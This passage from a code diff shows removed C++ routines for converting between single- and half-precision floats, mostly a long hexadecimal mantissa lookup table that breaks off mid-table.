24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 13 - }; - ConversionBits bits; - bits.f32 = value; - const unsigned short halfbits = base_table[bits.i32 >> 23] + - (unsigned short)((bits.i32 & 0x7FFFFF) >> shift_table[bits.i32 >> 23]); - return halfbits; -} - -// Converts a half-precision value to IEEE-compliant single-precision floating-point -static float HalfToFloat(const half value) { - static const unsigned int mantissa_table[2048] = { - 0x00000000, 0x33800000, 0x34000000, 0x34400000, 0x34800000, 0x34A00000, 0x34C00000, 0x34E00000, 0x35000000, 0x35100000, 0x35200000, 0x35300000, 0x35400000, 0x35500000, 0x35600000, 0x35700000, - 0x35800000, 0x35880000, 0x35900000, 0x35980000, 0x35A00000, 0x35A80000, 0x35B00000, 0x35B80000, 0x35C00000, 0x35C80000, 
0x35D00000, 0x35D80000, 0x35E00000, 0x35E80000, 0x35F00000, 0x35F80000, - 0x36000000, 0x36040000, 0x36080000, 0x360C0000, 0x36100000, 0x36140000, 0x36180000, 0x361C0000, 0x36200000, 0x36240000, 0x36280000, 0x362C0000, 0x36300000, 0x36340000, 0x36380000, 0x363C0000, - 0x36400000, 0x36440000, 0x36480000, 0x364C0000, 0x36500000, 0x36540000, 0x36580000, 0x365C0000, 0x36600000, 0x36640000, 0x36680000, 0x366C0000, 0x36700000, 0x36740000, 0x36780000, 0x367C0000, - 0x36800000, 0x36820000, 0x36840000, 0x36860000, 0x36880000, 0x368A0000, 0x368C0000, 0x368E0000, 0x36900000, 0x36920000, 0x36940000, 0x36960000, 0x36980000, 0x369A0000, 0x369C0000, 0x369E0000, - 0x36A00000, 0x36A20000, 0x36A40000, 0x36A60000, 0x36A80000, 0x36AA0000, 0x36AC0000, 0x36AE0000, 0x36B00000, 0x36B20000, 0x36B40000, 0x36B60000, 0x36B80000, 0x36BA0000, 0x36BC0000, 0x36BE0000, - 0x36C00000, 0x36C20000, 0x36C40000, 0x36C60000, 0x36C80000, 0x36CA0000, 0x36CC0000, 0x36CE0000, 0x36D00000, 0x36D20000, 0x36D40000, 0x36D60000, 0x36D80000, 0x36DA0000, 0x36DC0000, 0x36DE0000, - 0x36E00000, 0x36E20000, 0x36E40000, 0x36E60000, 0x36E80000, 0x36EA0000, 0x36EC0000, 0x36EE0000, 0x36F00000, 0x36F20000, 0x36F40000, 0x36F60000, 0x36F80000, 0x36FA0000, 0x36FC0000, 0x36FE0000, - 0x37000000, 0x37010000, 0x37020000, 0x37030000, 0x37040000, 0x37050000, 0x37060000, 0x37070000, 0x37080000, 0x37090000, 0x370A0000, 0x370B0000, 0x370C0000, 0x370D0000, 0x370E0000, 0x370F0000, - 0x37100000, 0x37110000, 0x37120000, 0x37130000, 0x37140000, 0x37150000, 0x37160000, 0x37170000, 0x37180000, 0x37190000, 0x371A0000, 0x371B0000, 0x371C0000, 0x371D0000, 0x371E0000, 0x371F0000, - 0x37200000, 0x37210000, 0x37220000, 0x37230000, 0x37240000, 0x37250000, 0x37260000, 0x37270000, 0x37280000, 0x37290000, 0x372A0000, 0x372B0000, 0x372C0000, 0x372D0000, 0x372E0000, 0x372F0000, - 0x37300000, 0x37310000, 0x37320000, 0x37330000, 0x37340000, 0x37350000, 0x37360000, 0x37370000, 0x37380000, 0x37390000, 0x373A0000, 0x373B0000, 0x373C0000, 0x373D0000, 0x373E0000, 0x373F0000, - 0x37400000, 0x37410000, 0x37420000, 0x37430000, 0x37440000, 0x37450000, 0x37460000, 0x37470000, 0x37480000, 0x37490000, 0x374A0000, 0x374B0000, 0x374C0000, 0x374D0000, 0x374E0000, 0x374F0000, - 0x37500000, 0x37510000, 0x37520000, 0x37530000, 0x37540000, 0x37550000, 0x37560000, 0x37570000, 0x37580000, 0x37590000, 0x375A0000, 0x375B0000, 0x375C0000, 0x375D0000, 0x375E0000, 0x375F0000, - 0x37600000, 0x37610000, 0x37620000, 0x37630000, 0x37640000, 0x37650000, 0x37660000, 0x37670000, 0x37680000, 0x37690000, 0x376A0000, 0x376B0000, 0x376C0000, 0x376D0000, 0x376E0000, 0x376F0000, - 0x37700000, 0x37710000, 0x37720000, 0x37730000, 0x37740000, 0x37750000, 0x37760000, 0x37770000, 0x37780000, 0x37790000, 0x377A0000, 0x377B0000, 0x377C0000, 0x377D0000, 0x377E0000, 0x377F0000, - 0x37800000, 0x37808000, 0x37810000, 0x37818000, 0x37820000, 0x37828000, 0x37830000, 0x37838000, 0x37840000, 0x37848000, 0x37850000, 0x37858000, 0x37860000, 0x37868000, 0x37870000, 0x37878000, - 0x37880000, 0x37888000, 0x37890000, 0x37898000, 0x378A0000, 0x378A8000, 0x378B0000, 0x378B8000, 0x378C0000, 0x378C8000, 0x378D0000, 0x378D8000, 0x378E0000, 0x378E8000, 0x378F0000, 0x378F8000, - 0x37900000, 0x37908000, 0x37910000, 0x37918000, 0x37920000, 0x37928000, 0x37930000, 0x37938000, 0x37940000, 0x37948000, 0x37950000, 0x37958000, 0x37960000, 0x37968000, 0x37970000, 0x37978000, - 0x37980000, 0x37988000, 0x37990000, 0x37998000, 0x379A0000, 0x379A8000, 0x379B0000, 0x379B8000, 0x379C0000, 0x379C8000, 0x379D0000, 0x379D8000, 0x379E0000, 0x379E8000, 0x379F0000, 
0x379F8000, - 0x37A00000, 0x37A08000, 0x37A10000, 0x37A18000, 0x37A20000, 0x37A28000, 0x37A30000, 0x37A38000, 0x37A40000, 0x37A48000, 0x37A50000, 0x37A58000, 0x37A60000, 0x37A68000, 0x37A70000, 0x37A78000, - 0x37A80000, 0x37A88000, 0x37A90000, 0x37A98000, 0x37AA0000, 0x37AA8000, 0x37AB0000, 0x37AB8000, 0x37AC0000, 0x37AC8000, 0x37AD0000, 0x37AD8000, 0x37AE0000, 0x37AE8000, 0x37AF0000, 0x37AF8000, - 0x37B00000, 0x37B08000, 0x37B10000, 0x37B18000, 0x37B20000, 0x37B28000, 0x37B30000, 0x37B38000, 0x37B40000, 0x37B48000, 0x37B50000, 0x37B58000, 0x37B60000, 0x37B68000, 0x37B70000, 0x37B78000, - 0x37B80000, 0x37B88000, 0x37B90000, 0x37B98000, 0x37BA0000, 0x37BA8000, 0x37BB0000, 0x37BB8000, 0x37BC0000, 0x37BC8000, 0x37BD0000, 0x37BD8000, 0x37BE0000, 0x37BE8000, 0x37BF0000, 0x37BF8000, - 0x37C00000, 0x37C08000, 0x37C10000, 0x37C18000, 0x37C20000, 0x37C28000, 0x37C30000, 0x37C38000, 0x37C40000, 0x37C48000, 0x37C50000, 0x37C58000, 0x37C60000, 0x37C68000, 0x37C70000, 0x37C78000, - 0x37C80000, 0x37C88000, 0x37C90000, 0x37C98000, 0x37CA0000, 0x37CA8000, 0x37CB0000, 0x37CB8000, 0x37CC0000, 0x37CC8000, 0x37CD0000, 0x37CD8000, 0x37CE0000, 0x37CE8000, 0x37CF0000, 0x37CF8000, - 0x37D00000, 0x37D08000, 0x37D10000, 0x37D18000, 0x37D20000, 0x37D28000, 0x37D30000, 0x37D38000, 0x37D40000, 0x37D48000, 0x37D50000, 0x37D58000, 0x37D60000, 0x37D68000, 0x37D70000, 0x37D78000, - 0x37D80000, 0x37D88000, 0x37D90000, 0x37D98000, 0x37DA0000, 0x37DA8000, 0x37DB0000, 0x37DB8000, 0x37DC0000, 0x37DC8000, 0x37DD0000, 0x37DD8000, 0x37DE0000, 0x37DE8000, 0x37DF0000, 0x37DF8000, - 0x37E00000, 0x37E08000, 0x37E10000, 0x37E18000, 0x37E20000, 0x37E28000, 0x37E30000, 0x37E38000, 0x37E40000, 0x37E48000, 0x37E50000, 0x37E58000, 0x37E60000, 0x37E68000, 0x37E70000, 0x37E78000, - 0x37E80000, 0x37E88000, 0x37E90000, 0x37E98000, 0x37EA0000, 0x37EA8000, 0x37EB0000, 0x37EB8000, 0x37EC0000, 0x37EC8000, 0x37ED0000, 0x37ED8000, 0x37EE0000, 0x37EE8000, 0x37EF0000, 0x37EF8000, - 0x37F00000, 0x37F08000, 0x37F10000, 0x37F18000, 0x37F20000, 0x37F28000, 0x37F30000, 0x37F38000, 0x37F40000, 0x37F48000, 0x37F50000, 0x37F58000, 0x37F60000, 0x37F68000, 0x37F70000, 0x37F78000, - 0x37F80000, 0x37F88000, 0x37F90000, 0x37F98000, 0x37FA0000, 0x37FA8000, 0x37FB0000, 0x37FB8000, 0x37FC0000, 0x37FC8000, 0x37FD0000, 0x37FD8000, 0x37FE0000, 0x37FE8000, 0x37FF0000, 0x37FF8000, - 0x38000000, 0x38004000, 0x38008000, 0x3800C000, 0x38010000, 0x38014000, 0x38018000, 0x3801C000, 0x38020000, 0x38024000, 0x38028000, 0x3802C000, 0x38030000, 0x38034000, 0x38038000, 0x3803C000, - 0x38040000, 0x38044000, 0x38048000, 0x3804C000, 0x38050000, 0x38054000, 0x38058000, 0x3805C000, 0x38060000, 0x38064000, 0x38068000, 0x3806C000, 0x38070000, 0x38074000, 0x38078000, 0x3807C000, - 0x38080000, 0x38084000, 0x38088000, 0x3808C000, 0x38090000, 0x38094000, 0x38098000, 0x3809C000, 0x380A0000, 0x380A4000, 0x380A8000, 0x380AC000, 0x380B0000, 0x380B4000, 0x380B8000, 0x380BC000, - 0x380C0000, 0x380C4000, 0x380C8000, 0x380CC000, 0x380D0000, 0x380D4000, 0x380D8000, 0x380DC000, 0x380E0000, 0x380E4000, 0x380E8000, 0x380EC000, 0x380F0000, 0x380F4000, 0x380F8000, 0x380FC000, - 0x38100000, 0x38104000, 0x38108000, 0x3810C000, 0x38110000, 0x38114000, 0x38118000, 0x3811C000, 0x38120000, 0x38124000, 0x38128000, 0x3812C000, 0x38130000, 0x38134000, 0x38138000, 0x3813C000, - 0x38140000, 0x38144000, 0x38148000, 0x3814C000, 0x38150000, 0x38154000, 0x38158000, 0x3815C000, 0x38160000, 0x38164000, 0x38168000, 0x3816C000, 0x38170000, 0x38174000, 0x38178000, 0x3817C000, - 0x38180000, 0x38184000, 0x38188000, 0x3818C000, 
0x38190000, 0x38194000, 0x38198000, 0x3819C000, 0x381A0000, 0x381A4000, 0x381A8000, 0x381AC000, 0x381B0000, 0x381B4000, 0x381B8000, 0x381BC000, - 0x381C0000, 0x381C4000, 0x381C8000, 0x381CC000, 0x381D0000, 0x381D4000, 0x381D8000, 0x381DC000, 0x381E0000, 0x381E4000, 0x381E8000, 0x381EC000, 0x381F0000, 0x381F4000, 0x381F8000, 0x381FC000, - 0x38200000, 0x38204000, 0x38208000, 0x3820C000, 0x38210000, 0x38214000, 0x38218000, 0x3821C000, 0x38220000, 0x38224000, 0x38228000, 0x3822C000, 0x38230000, 0x38234000, 0x38238000, 0x3823C000, - 0x38240000, 0x38244000, 0x38248000, 0x3824C000, 0x38250000, 0x38254000, 0x38258000, 0x3825C000, 0x38260000, 0x38264000, 0x38268000, 0x3826C000, 0x38270000, 0x38274000, 0x38278000, 0x3827C000, - 0x38280000, 0x38284000, 0x38288000, 0x3828C000, 0x38290000, 0x38294000, 0x38298000, 0x3829C000, 0x382A0000, 0x382A4000, 0x382A8000, 0x382AC000, 0x382B0000, 0x382B4000, 0x382B8000, 0x382BC000, - 0x382C0000, 0x382C4000, 0x382C8000, 0x382CC000, 0x382D0000, 0x382D4000, 0x382D8000, 0x382DC000, 0x382E0000, 0x382E4000, 0x382E8000, 0x382EC000, 0x382F0000, 0x382F4000, 0x382F8000, 0x382FC000, - 0x38300000, 0x38304000, 0x38308000, 0x3830C000, 0x38310000, 0x38314000, 0x38318000, 0x3831C000, 0x38320000, 0x38324000, 0x38328000, 0x3832C000, 0x38330000, 0x38334000, 0x38338000, 0x3833C000, - 0x38340000, 0x38344000, 0x38348000, 0x3834C000, 0x38350000, 0x38354000, 0x38358000, 0x3835C000, 0x38360000, 0x38364000, 0x38368000, 0x3836C000, 0x38370000, 0x38374000, 0x38378000, 0x3837C000, - 0x38380000, 0x38384000, 0x38388000, 0x3838C000, 0x38390000, 0x38394000, 0x38398000, 0x3839C000, 0x383A0000, 0x383A4000, 0x383A8000, 0x383AC000, 0x383B0000, 0x383B4000, 0x383B8000, 0x383BC000, - 0x383C0000, 0x383C4000, 0x383C8000, 0x383CC000, 0x383D0000, 0x383D4000, 0x383D8000, 0x383DC000, 0x383E0000, 0x383E4000, 0x383E8000, 0x383EC000, 0x383F0000, 0x383F4000, 0x383F8000, 0x383FC000, - 0x38400000, 0x38404000, 0x38408000, 0x3840C000, 0x38410000, 0x38414000, 0x38418000, 0x3841C000, 0x38420000, 0x38424000, 0x38428000, 0x3842C000, 0x38430000, 0x38434000, 0x38438000, 0x3843C000, - 0x38440000, 0x38444000, 0x38448000, 0x3844C000, 0x38450000, 0x38454000, 0x38458000, 0x3845C000, 0x38460000, 0x38464000, 0x38468000, 0x3846C000, 0x38470000, 0x38474000, 0x38478000, 0x3847C000, - 0x38480000, 0x38484000, 0x38488000, 0x3848C000, 0x38490000, 0x38494000, 0x38498000, 0x3849C000, 0x384A0000, 0x384A4000, 0x384A8000, 0x384AC000, 0x384B0000, 0x384B4000, 0x384B8000, 0x384BC000, - 0x384C0000, 0x384C4000, 0x384C8000, 0x384CC000, 0x384D0000, 0x384D4000, 0x384D8000, 0x384DC000, 0x384E0000, 0x384E4000, 0x384E8000, 0x384EC000, 0x384F0000, 0x384F4000, 0x384F8000, 0x384FC000, - 0x38500000, 0x38504000, 0x38508000, 0x3850C000, 0x38510000, 0x38514000, 0x38518000, 0x3851C000, 0x38520000, 0x38524000, 0x38528000, 0x3852C000, 0x38530000, 0x38534000, 0x38538000, 0x3853C000, - 0x38540000, 0x38544000, 0x38548000, 0x3854C000, 0x38550000, 0x38554000, 0x38558000, 0x3855C000, 0x38560000, 0x38564000, 0x38568000, 0x3856C000, 0x38570000, 0x38574000, 0x38578000, 0x3857C000, - 0x38580000, 0x38584000, 0x38588000, 0x3858C000, 0x38590000, 0x38594000, 0x38598000, 0x3859C000, 0x385A0000, 0x385A4000, 0x385A8000, 0x385AC000, 0x385B0000, 0x385B4000, 0x385B8000, 0x385BC000, - 0x385C0000, 0x385C4000, 0x385C8000, 0x385CC000, 0x385D0000, 0x385D4000, 0x385D8000, 0x385DC000, 0x385E0000, 0x385E4000, 0x385E8000, 0x385EC000, 0x385F0000, 0x385F4000, 0x385F8000, 0x385FC000, - 0x38600000, 0x38604000, 0x38608000, 0x3860C000, 0x38610000, 0x38614000, 0x38618000, 0x3861C000, 0x38620000, 
0x38624000, 0x38628000, 0x3862C000, 0x38630000, 0x38634000, 0x38638000, 0x3863C000, - 0x38640000, 0x38644000, 0x38648000, 0x3864C000, 0x38650000, 0x38654000, 0x38658000, 0x3865C000, 0x38660000, 0x38664000, 0x38668000, 0x3866C000, 0x38670000, 0x38674000, 0x38678000, 0x3867C000, - 0x38680000, 0x38684000, 0x38688000, 0x3868C000, 0x38690000, 0x38694000, 0x38698000, 0x3869C000, 0x386A0000, 0x386A4000, 0x386A8000, 0x386AC000, 0x386B0000, 0x386B4000, 0x386B8000, 0x386BC000, - 0x386C0000, 0x386C4000, 0x386C8000, 0x386CC000, 0x386D0000, 0x386D4000, 0x386D8000, 0x386DC000, 0x386E0000, 0x386E4000, 0x386E8000, 0x386EC000, 0x386F0000, 0x386F4000, 0x386F8000, 0x386FC000, - 0x38700000, 0x38704000, 0x38708000, 0x3870C000, 0x38710000, 0x38714000, 0x38718000, 0x3871C000, 0x38720000, 0x38724000, 0x38728000, 0x3872C000, 0x38730000, 0x38734000, 0x38738000, 0x3873C000, - 0x38740000, 0x38744000, 0x38748000, 0x3874C000, 0x38750000, 0x38754000, 0x38758000, 0x3875C000, 0x38760000, 0x38764000, 0x38768000, 0x3876C000, 0x38770000, 0x38774000, 0x38778000, 0x3877C000, - 0x38780000, 0x38784000, 0x38788000, 0x3878C000, 0x38790000, 0x38794000, 0x38798000, 0x3879C000, 0x387A0000, 0x387A4000, 0x387A8000, 0x387AC000, 0x387B0000, 0x387B4000, 0x387B8000, 0x387BC000, - 0x387C0000, 0x387C4000, 0x387C8000, 0x387CC000, 0x387D0000, 0x387D4000, 0x387D8000, 0x387DC000, 0x387E0000, 0x387E4000, 0x387E8000, 0x387EC000, 0x387F0000, 0x387F4000, 0x387F8000, 0x387FC000, - 0x38000000, 0x38002000, 0x38004000, 0x38006000, 0x38008000, 0x3800A000, 0x3800C000, 0x3800E000, 0x38010000, 0x38012000, 0x38014000, 0x38016000, 0x38018000, 0x3801A000, 0x3801C000, 0x3801E000, - 0x38020000, 0x38022000, 0x38024000, 0x38026000, 0x38028000, 0x3802A000, 0x3802C000, 0x3802E000, 0x38030000, 0x38032000, 0x38034000, 0x38036000, 0x38038000, 0x3803A000, 0x3803C000, 0x3803E000, - 0x38040000, 0x38042000, 0x38044000, 0x38046000, 0x38048000, 0x3804A000, 0x3804C000, 0x3804E000, 0x38050000, 0x38052000, 0x38054000, 0x38056000, 0x38058000, 0x3805A000, 0x3805C000, 0x3805E000, - 0x38060000, 0x38062000, 0x38064000, 0x38066000, 0x38068000, 0x3806A000, 0x3806C000, 0x3806E000, 0x38070000, 0x38072000, 0x38074000, 0x38076000, 0x38078000, 0x3807A000, 0x3807C000, 0x3807E000, - 0x38080000, 0x38082000, 0x38084000, 0x38086000, 0x38088000, 0x3808A000, 0x3808C000, 0x3808E000, 0x38090000, 0x38092000, 0x38094000, 0x38096000, 0x38098000, 0x3809A000, 0x3809C000, 0x3809E000, - 0x380A0000, 0x380A2000, 0x380A4000, 0x380A6000, 0x380A8000, 0x380AA000, 0x380AC000, 0x380AE000, 0x380B0000, 0x380B2000, 0x380B4000, 0x380B6000, 0x380B8000, 0x380BA000, 0x380BC000, 0x380BE000, - 0x380C0000, 0x380C2000, 0x380C4000, 0x380C6000, 0x380C8000, 0x380CA000, 0x380CC000, 0x380CE000, 0x380D0000, 0x380D2000, 0x380D4000, 0x380D6000, 0x380D8000, 0x380DA000, 0x380DC000, 0x380DE000, - 0x380E0000, 0x380E2000, 0x380E4000, 0x380E6000, 0x380E8000, 0x380EA000, 0x380EC000, 0x380EE000, 0x380F0000, 0x380F2000, 0x380F4000, 0x380F6000, 0x380F8000, 0x380FA000, 0x380FC000, 0x380FE000, - 0x38100000, 0x38102000, 0x38104000, 0x38106000, 0x38108000, 0x3810A000, 0x3810C000, 0x3810E000, 0x38110000, 0x38112000, 0x38114000, 0x38116000, 0x38118000, 0x3811A000, 0x3811C000, 0x3811E000, - 0x38120000, 0x38122000, 0x38124000, 0x38126000, 0x38128000, 0x3812A000, 0x3812C000, 0x3812E000, 0x38130000, 0x38132000, 0x38134000, 0x38136000, 0x38138000, 0x3813A000, 0x3813C000, 0x3813E000, - 0x38140000, 0x38142000, 0x38144000, 0x38146000, 0x38148000, 0x3814A000, 0x3814C000, 0x3814E000, 0x38150000, 0x38152000, 0x38154000, 0x38156000, 0x38158000, 0x3815A000, 
0x3815C000, 0x3815E000, - 0x38160000, 0x38162000, 0x38164000, 0x38166000, 0x38168000, 0x3816A000, 0x3816C000, 0x3816E000, 0x38170000, 0x38172000, 0x38174000, 0x38176000, 0x38178000, 0x3817A000, 0x3817C000, 0x3817E000, - 0x38180000, 0x38182000, 0x38184000, 0x38186000, 0x38188000, 0x3818A000, 0x3818C000, 0x3818E000, 0x38190000, 0x38192000, 0x38194000, 0x38196000, 0x38198000, 0x3819A000, 0x3819C000, 0x3819E000, - 0x381A0000, 0x381A2000, 0x381A4000, 0x381A6000, 0x381A8000, 0x381AA000, 0x381AC000, 0x381AE000, 0x381B0000, 0x381B2000, 0x381B4000, 0x381B6000, 0x381B8000, 0x381BA000, 0x381BC000, 0x381BE000, - 0x381C0000, 0x381C2000, 0x381C4000, 0x381C6000, 0x381C8000, 0x381CA000, 0x381CC000, 0x381CE000, 0x381D0000, 0x381D2000, 0x381D4000, 0x381D6000, 0x381D8000, 0x381DA000, 0x381DC000, 0x381DE000, - 0x381E0000, 0x381E2000, 0x381E4000, 0x381E6000, 0x381E8000, 0x381EA000, 0x381EC000, 0x381EE000, 0x381F0000, 0x381F2000, 0x381F4000, 0x381F6000, 0x381F8000, 0x381FA000, 0x381FC000, 0x381FE000, - 0x38200000, 0x38202000, 0x38204000, 0x38206000, 0x38208000, 0x3820A000, 0x3820C000, 0x3820E000, 0x38210000, 0x38212000, 0x38214000, 0x38216000, 0x38218000, 0x3821A000, 0x3821C000, 0x3821E000, - 0x38220000, 0x38222000, 0x38224000, 0x38226000, 0x38228000, 0x3822A000, 0x3822C000, 0x3822E000, 0x38230000, 0x38232000, 0x38234000, 0x38236000, 0x38238000, 0x3823A000, 0x3823C000, 0x3823E000, - 0x38240000, 0x38242000, 0x38244000, 0x38246000, 0x38248000, 0x3824A000, 0x3824C000, 0x3824E000, 0x38250000, 0x38252000, 0x38254000, 0x38256000, 0x38258000, 0x3825A000, 0x3825C000, 0x3825E000, - 0x38260000, 0x38262000, 0x38264000, 0x38266000, 0x38268000, 0x3826A000, 0x3826C000, 0x3826E000, 0x38270000, 0x38272000, 0x38274000, 0x38276000, 0x38278000, 0x3827A000, 0x3827C000, 0x3827E000, - 0x38280000, 0x38282000, 0x38284000, 0x38286000, 0x38288000, 0x3828A000, 0x3828C000, 0x3828E000, 0x38290000, 0x38292000, 0x38294000, 0x38296000, 0x38298000, 0x3829A000, 0x3829C000, 0x3829E000, - 0x382A0000, 0x382A2000, 0x382A4000, 0x382A6000, 0x382A8000, 0x382AA000, 0x382AC000, 0x382AE000, 0x382B0000, 0x382B2000, 0x382B4000, 0x382B6000, 0x382B8000, 0x382BA000, 0x382BC000, 0x382BE000, - 0x382C0000, 0x382C2000, 0x382C4000, 0x382C6000, 0x382C8000, 0x382CA000, 0x382CC000, 0x382CE000, 0x382D0000, 0x382D2000, 0x382D4000, 0x382D6000, 0x382D8000, 0x382DA000, 0x382DC000, 0x382DE000, - 0x382E0000, 0x382E2000, 0x382E4000, 0x382E6000, 0x382E8000, 0x382EA000, 0x382EC000, 0x382EE000, 0x382F0000, 0x382F2000, 0x382F4000, 0x382F6000, 0x382F8000, 0x382FA000, 0x382FC000, 0x382FE000, - 0x38300000, 0x38302000, 0x38304000, 0x38306000, 0x38308000, 0x3830A000, 0x3830C000, 0x3830E000, 0x38310000, 0x38312000, 0x38314000, 0x38316000, 0x38318000, 0x3831A000, 0x3831C000, 0x3831E000, - 0x38320000, 0x38322000, 0x38324000, 0x38326000, 0x38328000, 0x3832A000, 0x3832C000, 0x3832E000, 0x38330000, 0x38332000, 0x38334000, 0x38336000, 0x38338000, 0x3833A000, 0x3833C000, 0x3833E000, - 0x38340000, 0x38342000, 0x38344000, 0x38346000, 0x38348000, 0x3834A000, 0x3834C000, 0x3834E000, 0x38350000, 0x38352000, 0x38354000, 0x38356000, 0x38358000, 0x3835A000, 0x3835C000, 0x3835E000, - 0x38360000, 0x38362000, 0x38364000, 0x38366000, 0x38368000, 0x3836A000, 0x3836C000, 0x3836E000, 0x38370000, 0x38372000, 0x38374000, 0x38376000, 0x38378000, 0x3837A000, 0x3837C000, 0x3837E000, - 0x38380000, 0x38382000, 0x38384000, 0x38386000, 0x38388000, 0x3838A000, 0x3838C000, 0x3838E000, 0x38390000, 0x38392000, 0x38394000, 0x38396000, 0x38398000, 0x3839A000, 0x3839C000, 0x3839E000, - 0x383A0000, 0x383A2000, 0x383A4000, 
0x383A6000, 0x383A8000, 0x383AA000, 0x383AC000, 0x383AE000, 0x383B0000, 0x383B2000, 0x383B4000, 0x383B6000, 0x383B8000, 0x383BA000, 0x383BC000, 0x383BE000, - 0x383C0000, 0x383C2000, 0x383C4000, 0x383C6000, 0x383C8000, 0x383CA000, 0x383CC000, 0x383CE000, 0x383D0000, 0x383D2000, 0x383D4000, 0x383D6000, 0x383D8000, 0x383DA000, 0x383DC000, 0x383DE000, - 0x383E0000, 0x383E2000, 0x383E4000, 0x383E6000, 0x383E8000, 0x383EA000, 0x383EC000, 0x383EE000, 0x383F0000, 0x383F2000, 0x383F4000, 0x383F6000, 0x383F8000, 0x383FA000, 0x383FC000, 0x383FE000, - 0x38400000, 0x38402000, 0x38404000, 0x38406000, 0x38408000, 0x3840A000, 0x3840C000, 0x3840E000, 0x38410000, 0x38412000, 0x38414000, 0x38416000, 0x38418000, 0x3841A000, 0x3841C000, 0x3841E000, - 0x38420000, 0x38422000, 0x38424000, 0x38426000, 0x38428000, 0x3842A000, 0x3842C000, 0x3842E000, 0x38430000, 0x38432000, 0x38434000, 0x38436000, 0x38438000, 0x3843A000, 0x3843C000, 0x3843E000, - 0x38440000, 0x38442000, 0x38444000, 0x38446000, 0x38448000, 0x3844A000, 0x3844C000, 0x3844E000, 0x38450000, 0x38452000, 0x38454000, 0x38456000, 0x38458000, 0x3845A000, 0x3845C000, 0x3845E000, - 0x38460000, 0x38462000, 0x38464000, 0x38466000, 0x38468000, 0x3846A000, 0x3846C000, 0x3846E000, 0x38470000, 0x38472000, 0x38474000, 0x38476000, 0x38478000, 0x3847A000, 0x3847C000, 0x3847E000, - 0x38480000, 0x38482000, 0x38484000, 0x38486000, 0x38488000, 0x3848A000, 0x3848C000, 0x3848E000, 0x38490000, 0x38492000, 0x38494000, 0x38496000, 0x38498000, 0x3849A000, 0x3849C000, 0x3849E000, - 0x384A0000, 0x384A2000, 0x384A4000, 0x384A6000, 0x384A8000, 0x384AA000, 0x384AC000, 0x384AE000, 0x384B0000, 0x384B2000, 0x384B4000, 0x384B6000, 0x384B8000, 0x384BA000, 0x384BC000, 0x384BE000, - 0x384C0000, 0x384C2000, 0x384C4000, 0x384C6000, 0x384C8000, 0x384CA000, 0x384CC000, 0x384CE000, 0x384D0000, 0x384D2000, 0x384D4000, 0x384D6000, 0x384D8000, 0x384DA000, 0x384DC000, 0x384DE000, - 0x384E0000, 0x384E2000, 0x384E4000, 0x384E6000, 0x384E8000, 0x384EA000, 0x384EC000, 0x384EE000, 0x384F0000, 0x384F2000, 0x384F4000, 0x384F6000, 0x384F8000, 0x384FA000, 0x384FC000, 0x384FE000, - 0x38500000, 0x38502000, 0x38504000, 0x38506000, 0x38508000, 0x3850A000, 0x3850C000, 0x3850E000, 0x38510000, 0x38512000, 0x38514000, 0x38516000, 0x38518000, 0x3851A000, 0x3851C000, 0x3851E000, - 0x38520000, 0x38522000, 0x38524000, 0x38526000, 0x38528000, 0x3852A000, 0x3852C000, 0x3852E000, 0x38530000, 0x38532000, 0x38534000, 0x38536000, 0x38538000, 0x3853A000, 0x3853C000, 0x3853E000, - 0x38540000, 0x38542000, 0x38544000, 0x38546000, 0x38548000, 0x3854A000, 0x3854C000, 0x3854E000, 0x38550000, 0x38552000, 0x38554000, 0x38556000, 0x38558000, 0x3855A000, 0x3855C000, 0x3855E000, - 0x38560000, 0x38562000, 0x38564000, 0x38566000, 0x38568000, 0x3856A000, 0x3856C000, 0x3856E000, 0x38570000, 0x38572000, 0x38574000, 0x38576000, 0x38578000, 0x3857A000, 0x3857C000, 0x3857E000, - 0x38580000, 0x38582000, 0x38584000, 0x38586000, 0x38588000, 0x3858A000, 0x3858C000, 0x3858E000, 0x38590000, 0x38592000, 0x38594000, 0x38596000, 0x38598000, 0x3859A000, 0x3859C000, 0x3859E000, - 0x385A0000, 0x385A2000, 0x385A4000, 0x385A6000, 0x385A8000, 0x385AA000, 0x385AC000, 0x385AE000, 0x385B0000, 0x385B2000, 0x385B4000, 0x385B6000, 0x385B8000, 0x385BA000, 0x385BC000, 0x385BE000, - 0x385C0000, 0x385C2000, 0x385C4000, 0x385C6000, 0x385C8000, 0x385CA000, 0x385CC000, 0x385CE000, 0x385D0000, 0x385D2000, 0x385D4000, 0x385D6000, 0x385D8000, 0x385DA000, 0x385DC000, 0x385DE000, - 0x385E0000, 0x385E2000, 0x385E4000, 0x385E6000, 0x385E8000, 0x385EA000, 0x385EC000, 0x385EE000, 
0x385F0000, 0x385F2000, 0x385F4000, 0x385F6000, 0x385F8000, 0x385FA000, 0x385FC000, 0x385FE000, - 0x38600000, 0x38602000, 0x38604000, 0x38606000, 0x38608000, 0x3860A000, 0x3860C000, 0x3860E000, 0x38610000, 0x38612000, 0x38614000, 0x38616000, 0x38618000, 0x3861A000, 0x3861C000, 0x3861E000, - 0x38620000, 0x38622000, 0x38624000, 0x38626000, 0x38628000, 0x3862A000, 0x3862C000, 0x3862E000, 0x38630000, 0x38632000, 0x38634000, 0x38636000, 0x38638000, 0x3863A000, 0x3863C000, 0x3863E000, - 0x38640000, 0x38642000, 0x38644000, 0x38646000, 0x38648000, 0x3864A000, 0x3864C000, 0x3864E000, 0x38650000, 0x38652000, 0x38654000, 0x38656000, 0x38658000, 0x3865A000, 0x3865C000, 0x3865E000, - 0x38660000, 0x38662000, 0x38664000, 0x38666000, 0x38668000, 0x3866A000, 0x3866C000, 0x3866E000, 0x38670000, 0x38672000, 0x38674000, 0x38676000, 0x38678000, 0x3867A000, 0x3867C000, 0x3867E000, - 0x38680000, 0x38682000, 0x38684000, 0x38686000, 0x38688000, 0x3868A000, 0x3868C000, 0x3868E000, 0x38690000, 0x38692000, 0x38694000, 0x38696000, 0x38698000, 0x3869A000, 0x3869C000, 0x3869E000, - 0x386A0000, 0x386A2000, 0x386A4000, 0x386A6000, 0x386A8000, 0x386AA000, 0x386AC000, 0x386AE000, 0x386B0000, 0x386B2000, 0x386B4000, 0x386B6000, 0x386B8000, 0x386BA000, 0x386BC000, 0x386BE000, - 0x386C0000, 0x386C2000, 0x386C4000, 0x386C6000, 0x386C8000, 0x386CA000, 0x386CC000, 0x386CE000, 0x386D0000, 0x386D2000, 0x386D4000, 0x386D6000, 0x386D8000, 0x386DA000, 0x386DC000, 0x386DE000, - 0x386E0000, 